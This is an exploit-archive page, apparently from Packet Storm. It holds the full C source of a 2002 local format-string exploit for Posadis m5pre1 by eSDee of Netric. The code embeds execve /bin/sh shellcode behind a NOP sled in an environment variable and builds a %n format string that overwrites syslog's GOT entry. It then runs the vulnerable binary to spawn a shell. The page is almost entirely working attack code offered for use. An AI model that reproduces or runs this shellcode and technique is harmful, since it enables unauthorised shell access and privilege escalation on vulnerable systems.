exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

pos_expl.c

pos_expl.c
Posted Apr 23, 2002
Authored by eSDee, netric | Site netric.org

Posadis m5pre1 local buffer overflow exploit.

tags | exploit, overflow, local
SHA-256 | 02990a3bf9a9b52f587bd26ec96d8142429acc8d34e02e69e765ef4fb60221b1

pos_expl.c

Change Mirror Download
/* local posadis m5pre1 exploit by eSDee of Netric - (www.netric.org)
* ------------------------------------------------------------------
* (discovered by kkr - http://online.securityfocus.com/bid/4378)
*
* to find the retloc:
* objdump -R posa-dis | grep syslog
* 08063ddc R_386_JUMP_SLOT syslog
*
*/

#include <stdio.h>

#define RETLOC 0x08063ddc
#define RET 0xbffffdac

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int
padding(int write_byte, int already_written)
{
int padding;
write_byte += 0x100;
already_written %= 0x100;
padding = (write_byte - already_written) % 0x100;
if (padding < 10)
padding += 0x100;
return padding;
}

int
main()
{
char format[512],
writecode[8],
egg[1024],
*ptr;
int already_written = 0xfc,
tmp,
i;
long *addr_ptr;

ptr = egg;
for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90;
for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
egg[1024 - 1] = '\0';

memcpy(egg,"EGG=",4);
putenv(egg);

strcpy(format, "jjj");

ptr = format+3;
addr_ptr = (long *) ptr;

for (i = 0; i < 4; i++) {
*(addr_ptr++) = RETLOC + i;
*(addr_ptr++) = 0xb0efb0ef;
}
*(ptr + 32) = 0;

for (i = 0; i < 18; i++)
strcat(format, "%08x.");

for (i = 0; i <= 24; i += 8) {
tmp = padding((RET >> i) & 0xff, already_written) + 10;
sprintf(writecode, "%%%du%%n", tmp);
strcat(format, writecode);
already_written += tmp;
}

printf("local posadis m5pre1 exploit by eSDee of Netric - (www.netric.org)\n");
printf("------------------------------------------------------------------\n");
printf("return address : 0x%08x\n",RET);
printf("return location: 0x%08x\n\n",RETLOC);

execl("./posadis","posadis",format,NULL);
}

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close